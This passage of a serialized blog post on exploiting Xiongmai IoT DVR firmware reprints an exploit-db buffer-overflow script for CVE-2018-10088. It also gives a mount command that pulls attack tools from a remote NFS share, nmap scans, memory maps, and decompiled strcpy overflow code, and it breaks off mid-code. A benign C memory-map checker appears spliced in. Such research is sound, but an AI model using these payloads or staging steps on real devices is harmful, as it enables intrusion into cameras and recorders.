9530).",[25,115732,115733,115737],{},[47,115734,81977],{"href":115735,"rel":115736},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-26259",[51],": Unauthenticated and remote RTSP parsing stack buffer overflow.",[25,115739,115740,115743],{},[47,115741,106212],{"href":106220,"rel":115742},[51],": Authenticated and remote command execution via port 34567 upgrade logic.",[25,115745,115746,115750],{},[47,115747,81785],{"href":115748,"rel":115749},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-45460",[51],": Unauthenticated and remote HTTP request URI parsing stack-based buffer overflow.",[18,115752,115753,115754,14193,115758,982,115761,115765,115766,115769],{},"And that’s interesting due to an almost complete lack of high quality exploits for these vulnerabilities. You won’t find any in ",[47,115755,36852],{"href":115756,"rel":115757},"https:\u002F\u002Fwww.metasploit.com\u002F",[51],[47,115759,91930],{"href":91928,"rel":115760},[51],[47,115762,81936],{"href":115763,"rel":115764},"https:\u002F\u002Fgithub.com\u002Fthreat9\u002Froutersploit",[51]," only offer the path traversal information leak (CVE-2017-7577). 
One of the more widely cited Xiongmai ",[47,115767,11002],{"href":81939,"rel":115768},[51]," exploits is for CVE-2018-10088 and it’s entirely useless for code execution.",[1354,115771,115773],{"className":11719,"code":115772,"language":11721,"meta":219,"style":219},"# Exploit Title: XiongMai uc-httpd 1.0.0 - Buffer Overflow\n# Date: 2018-06-08           \n# Exploit Author: Andrew Watson\n# Software Version: XiongMai uc-httpd 1.0.0\n# Vendor Homepage: http:\u002F\u002Fwww.xiongmaitech.com\u002Fen\u002F\n# Tested on: KKMoon DVR running XiongMai uc-httpd 1.0.0 on TCP\u002F81\n# CVE ID: CVE-2018-10088\n# DISCLAIMER: This proof of concept is provided for educational purposes only!\n \n#!\u002Fusr\u002Fbin\u002Fpython\n \nimport socket\nimport sys\n \npayload=\"A\" * 85\n \nprint \"\\n###############################################\"\nprint \"XiongMai uc-httpd 1.0.0 Buffer Overflow Exploit\"\n \nif len(sys.argv) \u003C 2:\n    print \"\\nUsage: \" + sys.argv[0] + \" \u003CHost>\\n\"\n    sys.exit()\n \nprint \"\\nTarget: \" + sys.argv[1]\nprint \"Sending exploit...\"\ns=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((sys.argv[1],81))\ns.send('POST \u002Flogin.htm HTTP\u002F1.1\\r\\n')\ns.send('command=login&username=' + payload + '&password=PoC\\r\\n\\r\\n')\ns.recv(1024)\ns.close()\nprint \"\\nExploit complete!\"\n\n",[886,115774,115775,115780,115785,115790,115795,115800,115805,115810,115815,115819,115824,115828,115835,115841,115845,115862,115866,115880,115891,115895,115917,115955,115967,115971,115998,116009,116043,116070,116092,116127,116143,116153],{"__ignoreMap":219},[1373,115776,115777],{"class":1375,"line":1376},[1373,115778,115779],{"class":4630},"# Exploit Title: XiongMai uc-httpd 1.0.0 - Buffer Overflow\n",[1373,115781,115782],{"class":1375,"line":220},[1373,115783,115784],{"class":4630},"# Date: 2018-06-08           \n",[1373,115786,115787],{"class":1375,"line":1266},[1373,115788,115789],{"class":4630},"# Exploit Author: Andrew 
Watson\n",[1373,115791,115792],{"class":1375,"line":1852},[1373,115793,115794],{"class":4630},"# Software Version: XiongMai uc-httpd 1.0.0\n",[1373,115796,115797],{"class":1375,"line":4692},[1373,115798,115799],{"class":4630},"# Vendor Homepage: http:\u002F\u002Fwww.xiongmaitech.com\u002Fen\u002F\n",[1373,115801,115802],{"class":1375,"line":4724},[1373,115803,115804],{"class":4630},"# Tested on: KKMoon DVR running XiongMai uc-httpd 1.0.0 on TCP\u002F81\n",[1373,115806,115807],{"class":1375,"line":4756},[1373,115808,115809],{"class":4630},"# CVE ID: CVE-2018-10088\n",[1373,115811,115812],{"class":1375,"line":4768},[1373,115813,115814],{"class":4630},"# DISCLAIMER: This proof of concept is provided for educational purposes only!\n",[1373,115816,115817],{"class":1375,"line":4792},[1373,115818,19298],{"class":4640},[1373,115820,115821],{"class":1375,"line":4798},[1373,115822,115823],{"class":4630},"#!\u002Fusr\u002Fbin\u002Fpython\n",[1373,115825,115826],{"class":1375,"line":4806},[1373,115827,19298],{"class":4640},[1373,115829,115830,115832],{"class":1375,"line":4817},[1373,115831,19043],{"class":4636},[1373,115833,115834],{"class":4640}," socket\n",[1373,115836,115837,115839],{"class":1375,"line":4825},[1373,115838,19043],{"class":4636},[1373,115840,56176],{"class":4640},[1373,115842,115843],{"class":1375,"line":4835},[1373,115844,19298],{"class":4640},[1373,115846,115847,115849,115851,115853,115855,115857,115859],{"class":1375,"line":4843},[1373,115848,11736],{"class":4640},[1373,115850,5417],{"class":1397},[1373,115852,183],{"class":1387},[1373,115854,103840],{"class":1391},[1373,115856,183],{"class":1387},[1373,115858,19113],{"class":1397},[1373,115860,115861],{"class":5467}," 
85\n",[1373,115863,115864],{"class":1375,"line":4849},[1373,115865,19298],{"class":4640},[1373,115867,115868,115871,115873,115875,115878],{"class":1375,"line":4877},[1373,115869,115870],{"class":1379},"print",[1373,115872,4883],{"class":1387},[1373,115874,8943],{"class":2326},[1373,115876,115877],{"class":1391},"###############################################",[1373,115879,19057],{"class":1387},[1373,115881,115882,115884,115886,115889],{"class":1375,"line":4915},[1373,115883,115870],{"class":1379},[1373,115885,4883],{"class":1387},[1373,115887,115888],{"class":1391},"XiongMai uc-httpd 1.0.0 Buffer Overflow Exploit",[1373,115890,19057],{"class":1387},[1373,115892,115893],{"class":1375,"line":4931},[1373,115894,19298],{"class":4640},[1373,115896,115897,115899,115901,115903,115905,115907,115909,115911,115913,115915],{"class":1375,"line":4947},[1373,115898,4637],{"class":4636},[1373,115900,11730],{"class":1379},[1373,115902,1384],{"class":1383},[1373,115904,70245],{"class":11735},[1373,115906,59],{"class":1383},[1373,115908,89326],{"class":63570},[1373,115910,2230],{"class":1383},[1373,115912,27250],{"class":1397},[1373,115914,5499],{"class":5467},[1373,115916,11747],{"class":1383},[1373,115918,115919,115921,115923,115925,115928,115930,115932,115934,115936,115938,115940,115942,115944,115946,115948,115951,115953],{"class":1375,"line":4952},[1373,115920,63893],{"class":1379},[1373,115922,4883],{"class":1387},[1373,115924,8943],{"class":2326},[1373,115926,115927],{"class":1391},"Usage: ",[1373,115929,183],{"class":1387},[1373,115931,15478],{"class":1397},[1373,115933,89321],{"class":4640},[1373,115935,59],{"class":1383},[1373,115937,89326],{"class":63570},[1373,115939,7035],{"class":1383},[1373,115941,445],{"class":5467},[1373,115943,15050],{"class":1383},[1373,115945,15478],{"class":1397},[1373,115947,4883],{"class":1387},[1373,115949,115950],{"class":1391}," 
\u003CHost>",[1373,115952,8943],{"class":2326},[1373,115954,19057],{"class":1387},[1373,115956,115957,115960,115962,115965],{"class":1375,"line":6776},[1373,115958,115959],{"class":4640},"    sys",[1373,115961,59],{"class":1383},[1373,115963,115964],{"class":11735},"exit",[1373,115966,27326],{"class":1383},[1373,115968,115969],{"class":1375,"line":6781},[1373,115970,19298],{"class":4640},[1373,115972,115973,115975,115977,115979,115982,115984,115986,115988,115990,115992,115994,115996],{"class":1375,"line":7524},[1373,115974,115870],{"class":1379},[1373,115976,4883],{"class":1387},[1373,115978,8943],{"class":2326},[1373,115980,115981],{"class":1391},"Target: ",[1373,115983,183],{"class":1387},[1373,115985,15478],{"class":1397},[1373,115987,89321],{"class":4640},[1373,115989,59],{"class":1383},[1373,115991,89326],{"class":63570},[1373,115993,7035],{"class":1383},[1373,115995,467],{"class":5467},[1373,115997,7103],{"class":1383},[1373,115999,116000,116002,116004,116007],{"class":1375,"line":7530},[1373,116001,115870],{"class":1379},[1373,116003,4883],{"class":1387},[1373,116005,116006],{"class":1391},"Sending exploit...",[1373,116008,19057],{"class":1387},[1373,116010,116011,116013,116015,116018,116020,116022,116024,116026,116028,116031,116033,116036,116038,116041],{"class":1375,"line":7546},[1373,116012,94930],{"class":4640},[1373,116014,5417],{"class":1397},[1373,116016,116017],{"class":4640},"socket",[1373,116019,59],{"class":1383},[1373,116021,116017],{"class":11735},[1373,116023,1384],{"class":1383},[1373,116025,116017],{"class":11735},[1373,116027,59],{"class":1383},[1373,116029,116030],{"class":37971},"AF_INET",[1373,116032,5437],{"class":1383},[1373,116034,116035],{"class":11735}," 
socket",[1373,116037,59],{"class":1383},[1373,116039,116040],{"class":37971},"SOCK_STREAM",[1373,116042,11875],{"class":1383},[1373,116044,116045,116047,116049,116052,116054,116056,116058,116060,116062,116064,116066,116068],{"class":1375,"line":7571},[1373,116046,94930],{"class":4640},[1373,116048,59],{"class":1383},[1373,116050,116051],{"class":11735},"connect",[1373,116053,15969],{"class":1383},[1373,116055,70245],{"class":11735},[1373,116057,59],{"class":1383},[1373,116059,89326],{"class":63570},[1373,116061,7035],{"class":1383},[1373,116063,467],{"class":5467},[1373,116065,27625],{"class":1383},[1373,116067,81659],{"class":5467},[1373,116069,16761],{"class":1383},[1373,116071,116072,116074,116076,116079,116081,116083,116086,116088,116090],{"class":1375,"line":7598},[1373,116073,94930],{"class":4640},[1373,116075,59],{"class":1383},[1373,116077,116078],{"class":11735},"send",[1373,116080,1384],{"class":1383},[1373,116082,1388],{"class":1387},[1373,116084,116085],{"class":1391},"POST \u002Flogin.htm 
HTTP\u002F1.1",[1373,116087,15491],{"class":2326},[1373,116089,1388],{"class":1387},[1373,116091,11875],{"class":1383},[1373,116093,116094,116096,116098,116100,116102,116104,116107,116109,116111,116113,116115,116117,116120,116123,116125],{"class":1375,"line":7615},[1373,116095,94930],{"class":4640},[1373,116097,59],{"class":1383},[1373,116099,116078],{"class":11735},[1373,116101,1384],{"class":1383},[1373,116103,1388],{"class":1387},[1373,116105,116106],{"class":1391},"command=login&username=",[1373,116108,1388],{"class":1387},[1373,116110,15478],{"class":1397},[1373,116112,89427],{"class":11735},[1373,116114,15448],{"class":1397},[1373,116116,4713],{"class":1387},[1373,116118,116119],{"class":1391},"&password=PoC",[1373,116121,116122],{"class":2326},"\\r\\n\\r\\n",[1373,116124,1388],{"class":1387},[1373,116126,11875],{"class":1383},[1373,116128,116129,116131,116133,116136,116138,116141],{"class":1375,"line":7635},[1373,116130,94930],{"class":4640},[1373,116132,59],{"class":1383},[1373,116134,116135],{"class":11735},"recv",[1373,116137,1384],{"class":1383},[1373,116139,116140],{"class":5467},"1024",[1373,116142,11875],{"class":1383},[1373,116144,116145,116147,116149,116151],{"class":1375,"line":7640},[1373,116146,94930],{"class":4640},[1373,116148,59],{"class":1383},[1373,116150,75402],{"class":11735},[1373,116152,27326],{"class":1383},[1373,116154,116155,116157,116159,116161,116164],{"class":1375,"line":7648},[1373,116156,115870],{"class":1379},[1373,116158,4883],{"class":1387},[1373,116160,8943],{"class":2326},[1373,116162,116163],{"class":1391},"Exploit complete!",[1373,116165,19057],{"class":1387},[18,116167,116168,116169,116172,116173,10515,116177,10515,116182,116186],{},"Which brings me to the third reason I find these targets to be interesting, despite the lack of quality exploits, we know at least five of these issues have been exploited in the wild. 
You won’t find them listed in CISA’s ",[47,116170,10993],{"href":2864,"rel":116171},[51],", but ",[47,116174,116176],{"href":106693,"rel":116175},[51],"high",[47,116178,116181],{"href":116179,"rel":116180},"https:\u002F\u002Fcybersecurity.att.com\u002Fblogs\u002Flabs-research\u002Fbotenago-strike-again-malware-source-code-uploaded-to-github",[51],"quality",[47,116183,111257],{"href":116184,"rel":116185},"https:\u002F\u002Fblog.netlab.360.com\u002Fthe-new-developments-of-the-fbot-en\u002F",[51],", Greynoise, and our own honeypots leave no doubt (more on that later).",[18,116188,116189],{},"Another reason I find Xiongmai devices interesting is the continuity of the underlying software. A lot of IoT vendors ship wildly different firmware depending on the model or underlying hardware. Not the case with Xiongmai. The underlying software is more or less the same from 2016 through 2022. The majority of the system logic flows through a single binary named Sofia, just as it always has. That’s useful for an attacker (or researcher) because knowledge gained using a 2016 exploit can sometimes still be useful for a 2022 exploit.",[18,116191,116192],{},"Finally, these systems are very easy to acquire. Just snag one off of Amazon. They are relatively cheap too. Availability and price probably go a long way to explaining their popularity.",[18,116194,116195],{},[68,116196],{":width":10862,"alt":116197,"src":116198},"amazon_order","\u002Fblog\u002Fxiongmai-iot-exploitation\u002Famazon_sunba.png",[18,116200,116201],{},"Having hopefully convinced you that these systems are worthy of your attention, the remainder of this blog will be devoted to looking at these systems, and their exploitation, in more depth. We’ll quickly look at how the system has evolved over the years. We’ll look at developing exploits for two of the buffer overflows. We’ll examine a payload caught in a honeypot. 
We’ll attempt to get an idea of how widespread exploitation is and, finally, look at some concerning files on the Xiongmai firmware server.",[18,116203,116201],{},[1354,116205,116208],{"className":116206,"code":116207,"language":1359},[1357],"albinolobster@mournland:~$ nmap -sV -p1-65535 10.12.70.210\nStarting Nmap 7.80 ( https:\u002F\u002Fnmap.org ) at 2022-11-18 09:48 EST\nNmap scan report for 10.12.70.210\nHost is up (0.0025s latency).\nNot shown: 65530 closed ports\nPORT      STATE SERVICE       VERSION\n80\u002Ftcp    open  http          uc-httpd 1.0.0\n554\u002Ftcp   open  rtsp          H264DVR rtspd 1.0\n9527\u002Ftcp  open  unknown\n9530\u002Ftcp  open  unknown\n34567\u002Ftcp open  dhanalakshmi?\n",[886,116209,116207],{"__ignoreMap":219},[18,116211,116212,116213,116218,116219,116224],{},"All of these ports are affected by RCE vulnerabilities. Ports 9527 (CVE-2021-41506) and 9530 (CVE-2020-22253) are particularly egregious ",[47,116214,116217],{"href":116215,"rel":116216},"https:\u002F\u002Fcwe.mitre.org\u002Fdata\u002Fdefinitions\u002F489.html",[51],"debugging interfaces"," that were eventually phased out. 
A scan of an ",[47,116220,116223],{"href":116221,"rel":116222},"https:\u002F\u002Fwww.xiongmaitech.com\u002Fen\u002Findex.php\u002Fproduct\u002Fproduct-detail\u002F4\u002F225\u002F273",[51],"NBD8008R-PL"," using software version V4.03.R11.C6380202.12201.140000.0000000 (build time “2021-05-19”) shows that 80, 554, and 34567 have remained constant, but a couple of new ports have taken the place of the old debug interfaces:",[1354,116226,116229],{"className":116227,"code":116228,"language":1359},[1357],"albinolobster@mournland:~$ nmap -sV -p1-65535 10.12.70.218\nStarting Nmap 7.80 ( https:\u002F\u002Fnmap.org ) at 2022-11-18 09:52 EST\nNmap scan report for 10.12.70.218\nHost is up (0.0041s latency).\nNot shown: 65530 closed ports\nPORT      STATE SERVICE       VERSION\n80\u002Ftcp    open  http\n554\u002Ftcp   open  rtsp          H264DVR rtspd 1.0\n23000\u002Ftcp open  inovaport1?\n30100\u002Ftcp open  rwp?\n34567\u002Ftcp open  dhanalakshmi?\n",[886,116230,116228],{"__ignoreMap":219},[18,116232,116233],{},"Once on the device you can see that Sofia controlled most, but not all, of the ports in the 2016 version:",[1354,116235,116238],{"className":116236,"code":116237,"language":1359},[1357],"[root@LocalHost \u002Fvar]$ netstat -tlpn\nActive Internet connections (only servers)\nProto Recv-Q Send-Q Local Address           Foreign Address         State       PID\u002FProgram name    \ntcp        0      0 0.0.0.0:34567           0.0.0.0:*               LISTEN      615\u002FSofia\ntcp        0      0 0.0.0.0:554             0.0.0.0:*               LISTEN      615\u002FSofia\ntcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      615\u002FSofia\ntcp        0      0 0.0.0.0:9527            0.0.0.0:*               LISTEN      614\u002FdvrHelper\ntcp        0      0 0.0.0.0:9530            0.0.0.0:*               LISTEN      600\u002FmacGuarder\n",[886,116239,116237],{"__ignoreMap":219},[18,116241,116242],{},"By 2021 Sofia had consolidated control over all the 
remote interfaces:",[1354,116244,116247],{"className":116245,"code":116246,"language":1359},[1357],"\u002Fvar # netstat -tlpn\nActive Internet connections (only servers)\nProto Recv-Q Send-Q Local Address           Foreign Address         State       PID\u002FProgram name    \ntcp        0      0 0.0.0.0:554             0.0.0.0:*               LISTEN      1047\u002FSofia\ntcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1047\u002FSofia\ntcp        0      0 0.0.0.0:30100           0.0.0.0:*               LISTEN      1047\u002FSofia\ntcp        0      0 0.0.0.0:23000           0.0.0.0:*               LISTEN      1047\u002FSofia\ntcp        0      0 0.0.0.0:34567           0.0.0.0:*               LISTEN      1047\u002FSofia\n",[886,116248,116246],{"__ignoreMap":219},[18,116250,116251],{},"Sofia itself is not hugely different. Some functionality has come and gone, but, for example, the logic for parsing an HTTP request is recognizable when comparing a 2016 version against a 2022 version.",[18,116253,116254,116255,1246,116257,116260],{},"The most impactful changes have been a general cleanup of buffer overflows (using ",[886,116256,39210],{},[886,116258,116259],{},"strncpy",", etc), dynamically linking uClibc instead of statically compiling it in, and, from an exploitation point of view, disabling data execution. The system, dating back to 2016, has always had ASLR enabled, so in all versions we expect the heap, dynamic libraries, and the stack to have randomized base addresses. 
But in 2016, almost all writable pages were executable.",[1354,116262,116265],{"className":116263,"code":116264,"language":1359},[1357],"[root@LocalHost \u002Fvar]$ cat \u002Fproc\u002F615\u002Fmaps\n00008000-007df000 r-xp 00000000 00:0d 336        \u002Fvar\u002FSofia\n007e6000-0081e000 rwxp 007d6000 00:0d 336        \u002Fvar\u002FSofia\n0081e000-00a8c000 rwxp 00000000 00:00 0\n029c6000-035c0000 rwxp 00000000 00:00 0          [heap]\n… many lines removed …\nbe9da000-be9fb000 rwxp 00000000 00:00 0          [stack]\nffff0000-ffff1000 r-xp 00000000 00:00 0          [vectors]\n",[886,116266,116264],{"__ignoreMap":219},[18,116268,116269],{},"Which was especially useful because Sofia was not, and still is not, compiled as a position independent executable. It’s also useful to know that Sofia operates on a number of global data structures that, in older versions, an attacker could overwrite with shellcode to aid in exploitation (more on that later). But fast forward to 2022 and newer versions of Sofia aren’t as kind to attackers. 
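The two maps excerpts in this section carry the whole NX story, so here is a small checker, added here as an example and not part of VulnCheck’s tooling or Xiongmai’s firmware, that parses /proc/<pid>/maps lines, counts mappings that are both writable and executable, checks whether [stack] and [heap] are executable, and flags a main image mapped at the default ARM link address as non-PIE. The mapping lines are copied from the 2016 excerpt above and the 2021 excerpt that follows (with an ASCII placeholder for the removed lines); the non-PIE heuristic (first file-backed segment at 0x8000 or 0x10000) is an assumption of mine, not something the post states.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample input: the mapping lines from the 2016 Sofia excerpt
 * (PID 615), with the placeholder line kept so the parser has to skip it. */
const char SOFIA_2016_MAPS[] =
    "00008000-007df000 r-xp 00000000 00:0d 336        /var/Sofia\n"
    "007e6000-0081e000 rwxp 007d6000 00:0d 336        /var/Sofia\n"
    "0081e000-00a8c000 rwxp 00000000 00:00 0\n"
    "029c6000-035c0000 rwxp 00000000 00:00 0          [heap]\n"
    "... many lines removed ...\n"
    "be9da000-be9fb000 rwxp 00000000 00:00 0          [stack]\n"
    "ffff0000-ffff1000 r-xp 00000000 00:00 0          [vectors]\n";

/* Constructed sample input: the mapping lines from the 2021 excerpt (PID 1047). */
const char SOFIA_2021_MAPS[] =
    "00010000-00854000 r-xp 00000000 00:0d 954        /var/Sofia\n"
    "00863000-008bb000 rw-p 00843000 00:0d 954        /var/Sofia\n"
    "008bb000-02024000 rw-p 00000000 00:00 0          [heap]\n"
    "... many lines removed ...\n"
    "beb51000-beb73000 rw-p 00000000 00:00 0          [stack]\n"
    "bebe4000-bebe5000 r-xp 00000000 00:00 0          [sigpage]\n"
    "bebe5000-bebe6000 r--p 00000000 00:00 0          [vvar]\n"
    "bebe6000-bebe7000 r-xp 00000000 00:00 0          [vdso]\n"
    "ffff0000-ffff1000 r-xp 00000000 00:00 0          [vectors]\n";

struct maps_summary {
    int total;                 /* mapping lines parsed */
    int wx;                    /* mappings that are both writable and executable */
    int nx_stack;              /* 1 if [stack] is not executable */
    int nx_heap;               /* 1 if [heap] is not executable */
    unsigned long image_base;  /* start address of the first file-backed mapping */
};

/* Parse one "start-end perms offset dev inode [path]" line. Returns 0 on success;
 * anything that does not start with a hex range (prompts, placeholders) returns -1. */
static int parse_maps_line(const char *line, unsigned long *start,
                           unsigned long *end, char perms[5], char path[256])
{
    unsigned long off, inode;
    unsigned int dev_major, dev_minor;
    path[0] = '\0';
    int n = sscanf(line, "%lx-%lx %4s %lx %x:%x %lu %255s",
                   start, end, perms, &off, &dev_major, &dev_minor, &inode, path);
    return n >= 7 ? 0 : -1;
}

struct maps_summary summarize_maps(const char *maps)
{
    struct maps_summary s = {0, 0, 0, 0, 0};
    const char *p = maps;
    int seen_image = 0;

    while (*p != '\0') {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[512];
        if (len >= sizeof line) len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        p = nl ? nl + 1 : p + len;

        unsigned long start, end;
        char perms[5], path[256];
        if (parse_maps_line(line, &start, &end, perms, path) != 0)
            continue;                       /* skips the "... many lines removed ..." placeholder */
        s.total++;
        if (perms[1] == 'w' && perms[2] == 'x') s.wx++;
        if (strcmp(path, "[stack]") == 0) s.nx_stack = (perms[2] != 'x');
        if (strcmp(path, "[heap]") == 0)  s.nx_heap  = (perms[2] != 'x');
        if (!seen_image && path[0] == '/') { s.image_base = start; seen_image = 1; }
    }
    return s;
}

/* Heuristic (assumption, not a definitive PIE test): a main image whose first
 * segment sits at the default ARM link address (0x8000 on older toolchains,
 * 0x10000 on newer ones) was linked as ET_EXEC, so ASLR cannot move it and its
 * globals have fixed addresses. A PIE image would show up at a randomized high address. */
int looks_non_pie(const struct maps_summary *s)
{
    return s->image_base == 0x8000 || s->image_base == 0x10000;
}

int image_is_non_pie(const char *maps)
{
    struct maps_summary s = summarize_maps(maps);
    return looks_non_pie(&s);
}

int main(void)
{
    struct maps_summary a = summarize_maps(SOFIA_2016_MAPS);
    struct maps_summary b = summarize_maps(SOFIA_2021_MAPS);
    printf("2016: %d of %d mappings W+X, NX stack=%d, NX heap=%d, non-PIE=%d\n",
           a.wx, a.total, a.nx_stack, a.nx_heap, looks_non_pie(&a));
    printf("2021: %d of %d mappings W+X, NX stack=%d, NX heap=%d, non-PIE=%d\n",
           b.wx, b.total, b.nx_stack, b.nx_heap, looks_non_pie(&b));
    return 0;
}
```

Run against the two excerpts it reports four W+X mappings (Sofia’s own data, the anonymous region, the heap and the stack) for 2016 and none for 2021, while both images sit at a fixed base. That combination is exactly what the rest of this post trades on: the 2016 target lets you execute out of any writable global, and the 2021 target still hands you fixed addresses for ROP even though you can no longer run code from data.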
Sofia’s base isn’t randomized, but data execution has been disabled:",[1354,116271,116274],{"className":116272,"code":116273,"language":1359},[1357],"\u002Fvar # cat \u002Fproc\u002F1047\u002Fmaps\n00010000-00854000 r-xp 00000000 00:0d 954        \u002Fvar\u002FSofia\n00863000-008bb000 rw-p 00843000 00:0d 954        \u002Fvar\u002FSofia\n008bb000-02024000 rw-p 00000000 00:00 0          [heap]\n… many lines removed …\nbeb51000-beb73000 rw-p 00000000 00:00 0          [stack]\nbebe4000-bebe5000 r-xp 00000000 00:00 0          [sigpage]\nbebe5000-bebe6000 r--p 00000000 00:00 0          [vvar]\nbebe6000-bebe7000 r-xp 00000000 00:00 0          [vdso]\nffff0000-ffff1000 r-xp 00000000 00:00 0          [vectors]\n",[886,116275,116273],{"__ignoreMap":219},[18,116277,116278],{},"Of course, ROP chains are still very much in play with the new version, as we’ll see for CVE-2022-26259, but things are a bit more difficult than they were back in 2016.",[18,116280,116281,116282,116286,116287,116289],{},"The final thing that hasn’t changed over the years is that these devices are almost devoid of ",[47,116283,116285],{"href":37718,"rel":116284},[51],"gtfobins",". The system has no curl, wget, nc, telnet, etc, for an attacker to download an implant or establish reverse shells. The ",[1131,116288,62400],{}," gtfobin Xiongmai devices have is busybox’s telnetd. And sometimes the telnetd symlink doesn’t even exist on the system, so the attacker has to invoke the binary via busybox directly (a challenge given the size constraints of some of the overflows). While telnetd is useful, it’s a limiting factor for real world attacks, as it requires the victim not to have a firewall in place that would prevent access to the newly opened port.",[18,116291,116292,116293,116295],{},"Spending time on this system did make me appreciate one command that isn’t generally considered a gtfobin: the ",[886,116294,16339],{}," command. 
Downloading and executing files via a mounted network file share saved me a lot of time I’d otherwise have spent echoing binaries onto the system.",[1354,116297,116299],{"className":2195,"code":116298,"language":2197,"meta":219,"style":219},"mkdir \u002Fvar\u002Fxploit_tools\u002F\nmount -o nolock 10.12.70.252:\u002Fsrv\u002F \u002Fvar\u002Fxploit_tools\u002F\n",[886,116300,116301,116308],{"__ignoreMap":219},[1373,116302,116303,116305],{"class":1375,"line":1376},[1373,116304,31859],{"class":2206},[1373,116306,116307],{"class":1391}," \u002Fvar\u002Fxploit_tools\u002F\n",[1373,116309,116310,116312,116314,116317,116320],{"class":1375,"line":220},[1373,116311,16339],{"class":2206},[1373,116313,39692],{"class":2209},[1373,116315,116316],{"class":1391}," nolock",[1373,116318,116319],{"class":1391}," 10.12.70.252:\u002Fsrv\u002F",[1373,116321,116307],{"class":1391},[18,116323,116324],{},"With that background information, let’s look at developing some exploits.",[61,116326,116328],{"id":116327},"cve-2018-10088-credentials-overflow","CVE-2018-10088: Credentials Overflow",[18,116330,116331,116332,116337,116338,116341,116342,116345,116346,1554,116350,116355],{},"Multiple security companies have linked exploitation of CVE-2018-10088 to botnets. Fortiguard linked it to ",[47,116333,116336],{"href":116334,"rel":116335},"https:\u002F\u002Fwww.fortiguard.com\u002Fthreat-signal-report\u002F4389\u002Fbotenago-malware-targets-multiple-iot-devices",[51],"Botenago",". Netlab 360 linked it to ",[47,116339,81951],{"href":81949,"rel":116340},[51],". Fortinet linked it to ",[47,116343,81956],{"href":81954,"rel":116344},[51],". 
Although both Greynoise tags for this CVE are ",[47,116347,81313],{"href":116348,"rel":116349},"https:\u002F\u002Fviz.greynoise.io\u002Ftag\u002Fxiongmai-buffer-overflow-cve-2018-10088-attempt?days=30",[51],[47,116351,116354],{"href":116352,"rel":116353},"https:\u002F\u002Fviz.greynoise.io\u002Ftag\u002Fxiongmai-uc-httpd-buffer-overflow-attempt?days=30",[51],"less"," inactive.",[18,116357,116358,116359,116362,116363,116366],{},"Regardless, exploitation in the wild is interesting because we aren’t aware of any public exploits that lead to code execution for this vulnerability (as stated earlier, the exploit-db ",[47,116360,22852],{"href":81939,"rel":116361},[51]," only triggers a crash). So we wrote our own. This proved to be a fairly trivial exercise.  The buffer overflow is the result of copying the username and password from ",[886,116364,116365],{},"command=login"," into some global memory.",[1354,116368,116370],{"className":92494,"code":116369,"language":28578,"meta":219,"style":219},"iVar1 = FUN_006784e4(0,\"&\");\nstrcpy(&global_username,iVar1 + 9);\niVar1 = FUN_006784e4(0,\"&\");\nstrcpy(&global_password,iVar1 + 9);\nDAT_00a3c4d8 = DAT_00a3c4e4;\nif (DAT_009806f8 != (code *)0x0) {\n    DAT_00a3c4a8 = (*DAT_009806f8)(0,&global_username,0x2c,DAT_00a3c504);\n}\nif (DAT_00a3c4a8 == 0) {\n    sprintf(local_140,\"%s%s\",\"\u002Fmnt\",\"\u002FDVR\");\n    FUN_004193dc(param_1,local_140,0);\n    return 0;\n}\nsprintf(local_140,\"%s%s\",\"\u002Fmnt\",\"\u002Ffailed.htm\");\n\n",[886,116371,116372,116396,116419,116441,116462,116474,116502,116541,116545,116562,116601,116621,116629,116633],{"__ignoreMap":219},[1373,116373,116374,116377,116379,116382,116384,116386,116388,116390,116392,116394],{"class":1375,"line":1376},[1373,116375,116376],{"class":4640},"iVar1 ",[1373,116378,5417],{"class":1397},[1373,116380,116381],{"class":7297}," 
FUN_006784e4",[1373,116383,1384],{"class":1383},[1373,116385,445],{"class":5467},[1373,116387,5437],{"class":1383},[1373,116389,183],{"class":1387},[1373,116391,7218],{"class":1391},[1373,116393,183],{"class":1387},[1373,116395,4680],{"class":1383},[1373,116397,116398,116401,116403,116405,116408,116410,116412,116414,116417],{"class":1375,"line":220},[1373,116399,116400],{"class":7297},"strcpy",[1373,116402,1384],{"class":1383},[1373,116404,7218],{"class":1397},[1373,116406,116407],{"class":19096},"global_username",[1373,116409,5437],{"class":1383},[1373,116411,116376],{"class":4640},[1373,116413,15448],{"class":1397},[1373,116415,116416],{"class":5467}," 9",[1373,116418,4680],{"class":1383},[1373,116420,116421,116423,116425,116427,116429,116431,116433,116435,116437,116439],{"class":1375,"line":1266},[1373,116422,116376],{"class":4640},[1373,116424,5417],{"class":1397},[1373,116426,116381],{"class":7297},[1373,116428,1384],{"class":1383},[1373,116430,445],{"class":5467},[1373,116432,5437],{"class":1383},[1373,116434,183],{"class":1387},[1373,116436,7218],{"class":1391},[1373,116438,183],{"class":1387},[1373,116440,4680],{"class":1383},[1373,116442,116443,116445,116447,116449,116452,116454,116456,116458,116460],{"class":1375,"line":1852},[1373,116444,116400],{"class":7297},[1373,116446,1384],{"class":1383},[1373,116448,7218],{"class":1397},[1373,116450,116451],{"class":19096},"global_password",[1373,116453,5437],{"class":1383},[1373,116455,116376],{"class":4640},[1373,116457,15448],{"class":1397},[1373,116459,116416],{"class":5467},[1373,116461,4680],{"class":1383},[1373,116463,116464,116467,116469,116472],{"class":1375,"line":4692},[1373,116465,116466],{"class":4640},"DAT_00a3c4d8 ",[1373,116468,5417],{"class":1397},[1373,116470,116471],{"class":4640}," 
